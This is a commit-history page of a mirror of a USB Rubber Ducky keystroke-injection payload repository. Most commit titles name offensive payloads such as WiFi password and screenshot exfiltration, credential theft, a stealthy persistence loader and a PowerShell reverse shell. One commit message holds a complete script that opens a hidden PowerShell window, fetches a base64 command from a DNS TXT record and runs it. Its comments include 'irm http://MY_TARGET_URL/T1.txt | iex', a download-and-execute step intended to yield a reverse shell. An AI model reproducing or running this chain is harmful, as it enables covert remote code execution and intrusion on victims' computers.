hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
1,324 Commits
4 Branches
0 Tags
53 MiB
Commit Graph

1139 Commits (master)

Author SHA1 Message Date
Alessandro Greco c895160753 from - to _ 2024-08-20 12:27:36 +02:00
Nate afe674fcda
Create README.md 2024-08-06 19:30:25 -05:00
Nate a9afcc0c6d
Create Kill-Explorer.txt 
initial commit with ducky script
 2024-08-06 19:29:22 -05:00
Peaks e1531cc317
Merge pull request #468 from nathansb2022/master 
Create payload DNS-TXT-CommandInjection.txt
 2024-08-06 17:19:17 -04:00
Thomas Boeglin f0cb608d09 Add Windows-Screenshot-Exfil payload 2024-08-06 09:58:39 +02:00
Nate f2896f0b6f
Update DNS-TXT-CommandInjection.txt 
Added PASSIVE_WINDOWS_DETECT EXTENSION per requested changes in pull request.
 2024-08-05 14:21:46 -05:00
Nate 8eba7c5e9b
Delete payloads/library/execution/Kill-Explorer directory 2024-08-04 20:13:49 -05:00
Nate 5928326db7
Update README.md 2024-08-04 20:08:11 -05:00
Nate 42d2d6e9d5
Create Kill-Explorer.txt 2024-08-04 20:07:36 -05:00
Nate 97ae3a7339
Create README.md 2024-08-04 20:06:35 -05:00
Nate e1c39bd455
Create DNS-TXT-CommandInjection.txt 
Made changes requested from pull request. 1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actually payload content. - Removed the clutter
4. If your target machine is windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is ran on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing.So, removed extension added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
 2024-08-04 18:08:21 -05:00
Nate f43a37e607
Create powershellReverseShellOne-liner.ps1 
updated comments
 2024-08-04 18:04:18 -05:00
Nate 5ff699caa2
Update README.md 
fixed formatting
 2024-08-04 18:01:43 -05:00
Nate ae0d976dce
Update README.md 
fixed formatting
 2024-08-04 18:01:10 -05:00
Nate 7658b87ce0
Update README.md 
fixed readme formatting
 2024-08-04 18:00:29 -05:00
Nate abd0a09360
Create README.md 
Updated to reflect requested changes from pull request.
 2024-08-04 17:58:09 -05:00
Nate c8e0ac280b
Delete payloads/library/execution/DNS-TXT-CommandInjection directory 
deleting and removing files from requested changes in Pull request
 2024-08-04 14:29:33 -05:00
Nate 1fd0843049
Delete payloads/library/execution/DNS-TXT-CommandInection directory 
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection direcotory
 2024-08-04 10:46:16 -05:00
Nate 7c989706cc
Update DNS-TXT-CommandInjection.txt 
updated folder, misspelled injection and update link to ConvertBase64.ps1
 2024-08-04 10:41:20 -05:00
Nate c1608976d9
Update README.md 
updated folder, misspelled injection and updated link to ConvertBase64.ps1
 2024-08-04 10:38:54 -05:00
Nate 072a5dbc8a
Create ConvertBase64.ps1 
updated folder, misspelled injection
 2024-08-04 10:37:16 -05:00
Nate cea9eb46ef
Create powershellReverseShellOne-liner.ps1 
updated folder, misspelled commandInjection
 2024-08-04 10:35:42 -05:00
Nate e985ed3a61
Create T1.txt 
updated folder, misspelled injection
 2024-08-04 10:34:32 -05:00
Nate 3b8a1d9ec5
Create README.md 
updating to new folder, misspelled injection
 2024-08-04 10:33:19 -05:00
Nate c832c1868c
Create DNS-TXT-CommandInjection.txt 
misspelled Injection in file name
 2024-08-04 10:31:39 -05:00
Nate 867b15eb6d
Create .gitignore 
misspelled folder
 2024-08-04 10:29:45 -05:00
Nate 054f81e077
Update DNS-TXT-CommandInection.txt 
misspelled injection
 2024-08-04 10:24:30 -05:00
Nate e4cbee78f1
Update README.md 
misspelled injection
 2024-08-04 10:23:43 -05:00
Nate 2782d874c9
Update README.md 2024-08-03 23:50:18 -05:00
Nate ada8bf9ea7
Update DNS-TXT-CommandInection.txt 2024-08-03 23:47:09 -05:00
Nate 13355e8519
Update README.md 2024-08-03 23:43:50 -05:00
Nate fc745db314
Update README.md 2024-08-03 23:40:57 -05:00
Nate b4978b7b47
Update DNS-TXT-CommandInection.txt 2024-08-03 23:37:33 -05:00
Nate 1db132c3ac
Update README.md 2024-08-03 23:36:21 -05:00
Nate 902412339b
Update DNS-TXT-CommandInection.txt 2024-08-03 23:35:02 -05:00
Nate 7a36e6324a
Update powershellReverseShellOne-liner.ps1 2024-08-03 23:33:41 -05:00
Nate dad3d550fe
Create DNS-TXT-CommandInection.txt 
REM     Title: DNS-TXT-CommandInection
REM     Author: Nate
REM     Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM     Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM     the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM 	and an example of creating your DNS TXT record in AWS Route53 service.
REM     Target: Windows 10, 11
REM     Props: Hak5, Darren Kitchen, Korben
REM     Version: 1.0
REM     Category: Execution

REM     CONFIGURATION
REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a 
REM     reverseshell.
REM     REQUIRED - Provide URL used for Example
DEFINE  #MY_TARGET_URL example.com
REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"

REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
REM     into DNS TXT record.
REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="

REM     ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM     The link below has the Powershell script to convert your payloads to Base64.
REM     https://	

DELAY 1000 
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
 2024-08-03 23:32:09 -05:00
Nate 571e2e6e33
Create T1.txt 2024-08-03 23:30:46 -05:00
Nate 3578034173
Create powershellReverseShellOne-liner.ps1 2024-08-03 23:30:02 -05:00
Nate b31e55d14a
Create convertBase64.ps1 2024-08-03 23:29:01 -05:00
Nate 784e37b063
Create README.md 2024-08-03 23:27:09 -05:00
Nate 460c95f5df
Update .gitignore 2024-08-03 21:19:44 -05:00
Nate b1999a0e7e
Create .gitignore 
.gitignore as a placeholder
 2024-08-03 21:17:34 -05:00
Nicolo’ c5fe32cf05
Update payload.txt 2024-07-24 22:12:43 +02:00
Nicolo’ 8754d6eab4
Update sy_cred.ps1 2024-07-24 21:23:43 +02:00
Nicolo’ 791133a14e
Update README.md 2024-07-24 21:23:04 +02:00
Nicolo’ dc4ccd1874
Update README.md 2024-07-24 21:22:14 +02:00
Nicolo’ 7972203c71
Update README.md 2024-07-24 21:18:14 +02:00
Nicolo’ 10b6ea2f0e
Update sy_cred.ps1 2024-07-24 21:15:49 +02:00
Nicolo’ 3dc6750316
Update payload.txt 2024-07-24 21:14:16 +02:00
Nicolo’ fcc1caf610
Update sy_cred.ps1 2024-07-24 19:58:46 +02:00
Nicolo’ d68bf2967f
Update payload.txt 2024-07-24 19:52:11 +02:00
Nicolo’ c231b242cb
Create sy_cred.ps1 2024-07-24 19:51:53 +02:00
Nicolo’ ab486b9b9f
Create payload.txt 2024-07-24 19:50:19 +02:00
Nicolo’ 4f1ae9c312
Create README.md 2024-07-24 19:47:41 +02:00
Peaks 30de5c0260
Merge pull request #465 from F1ll0ry/master 
WiFi-Passwords-Exfiltration-Via-SCP
 2024-07-23 03:14:22 -04:00
zb0r 6bce38ad77 Renamed directory from WiFi-Passwords-Exfiltration to WiFi-Passwords-Exfiltration-Via-SCP 2024-07-22 09:01:08 +00:00
Peaks e17abcfa02
Merge pull request #464 from PlumpyTurkey/master 
Updates extensions and payloads
 2024-07-21 21:16:19 -04:00
zb0r 023c46c15a
Fixed a typo in the extension 2024-07-19 01:40:38 +03:00
zb0r 152f89c78d
fixed the extension 2024-07-19 01:34:58 +03:00
Peaks c79209168a
Update payload.txt 
Fixing my mistake of wrong extension.
 2024-07-18 16:56:45 -04:00
Peaks 6a33d49db1
Update payload.txt 
Fixing Extension call. content was missing.
 2024-07-18 16:54:34 -04:00
zb0r cd3d4e7e42
Create README.md 2024-07-18 12:05:14 +03:00
zb0r 25b879d4ff
Create Payload.txt 2024-07-18 12:04:12 +03:00
Robert Naame 17b28cd2ee Moved WiFi-Passwords-Exfiltration files to exfiltration directory 2024-07-18 11:51:12 +03:00
zb0r 50812cddfa
Updated a typo 2024-07-18 11:35:55 +03:00
zb0r 114209b817
Create README.md 2024-07-18 10:59:30 +03:00
zb0r c174b59c50
Create payload.txt 2024-07-18 10:56:11 +03:00
PlumpyTurkey da3191f6f2 Updates version badge 2024-07-12 16:51:33 +02:00
PlumpyTurkey 3e5ca780e6 Updates extensions 2024-07-12 16:46:13 +02:00
PlumpyTurkey 52f6bdbc6f Uses a function instead of executing directly 2024-07-12 16:41:39 +02:00
Peaks b469affe05
Merge pull request #410 from Mr-Proxy-source/master 
1 New Mobile IOS payload | 2 New Exfiltration payloads
 2024-07-11 10:51:10 -04:00
Mr. Proxy c59a06365e
Added line number. 2024-07-10 01:41:10 +02:00
Mr. Proxy 69b17636d2
Remove link. 2024-07-10 01:40:38 +02:00
Mr. Proxy d67cbf2004
Added instructions to readme. 2024-07-10 01:40:10 +02:00
Mr. Proxy a8411c91f7
Fix link. 2024-07-10 01:35:51 +02:00
Peaks 4fb883c8ee
Merge pull request #354 from aleff-github/patch-68 
Defend Yourself From CVE-2023-23397
 2024-07-09 09:45:15 -04:00
Peaks b19ede4efe
Merge pull request #461 from F1ll0ry/master 
The-Perfect-Stealthy-Payload
 2024-07-09 09:32:00 -04:00
zb0r fd925f1fe3 Rename folder from 'Cache Folder Exclusion & Payload Download + Persistence' to 'The-Perfect-Stealthy-Payload' 2024-07-09 06:30:20 +00:00
zb0r 6a5a148642 Revert "Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload" 
This reverts commit 972d70d78e.
 2024-07-09 06:26:21 +00:00
zb0r 972d70d78e
Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload 2024-07-09 09:18:47 +03:00
Alessandro Greco 25a18f4e96 [+] PASSIVE_WINDOWS_DETECT 2024-07-09 07:35:40 +02:00
Mr. Proxy db42b39dc0
Removing made changes. 2024-07-03 18:59:09 +02:00
zb0r 50faacbf53
Update payload.txt 2024-07-03 10:58:31 +03:00
zb0r 1309e9b825
Update payload.txt 2024-07-03 10:57:30 +03:00
zb0r f1c213b48c
Update README.md 2024-07-03 10:56:17 +03:00
Mr. Proxy ffea938417
Fixed defining for google exfil 2024-07-02 12:12:43 +02:00
Mr. Proxy c4aaea55be
Fix for defining 2024-07-02 12:11:11 +02:00
zb0r 18e495712b
added PASSIVE_WINDOWS_DETECT 2024-07-01 14:21:10 +03:00
Dallas Winger 6afdd39d95
add onemillioncheckboxes.com checker payload 2024-06-26 17:02:10 -04:00
Peaks 1bdf62bc7e
Merge pull request #431 from PlumpyTurkey/master 
New Payloads and Extensions
 2024-06-26 16:45:10 -04:00
zb0r 07a4f98dc9
Update payload.txt 2024-06-25 15:50:21 +03:00
zb0r 9cb9099976
Create README.md 
initial commit
 2024-06-25 13:26:57 +03:00
zb0r 95c823b642
initial commit 
Created the Payload
 2024-06-25 13:16:31 +03:00
LulzAnarchyAnon 68997ce959
Update payload.txt 2024-06-11 19:57:36 -07:00
Peaks cd63cd6b2e
Fixing REM typo 2024-06-10 11:57:26 -04:00
LulzAnarchyAnon bf5044f3c7
Update payload.txt 2024-06-10 08:47:04 -07:00
Peaks cd3704042c
Merge pull request #411 from Kr1ss-XD/patch-DuckyLogger 
Patch ducky logger
 2024-06-09 15:27:26 -04:00
Peaks b59f95f00d
Merge pull request #453 from aleff-github/patch-86 
Prank In The Middle - Thunderbird
 2024-06-06 22:02:49 -04:00
Aleff 255713357b
[+] STRINGLN_POWERSHELL 2024-06-06 10:03:22 +02:00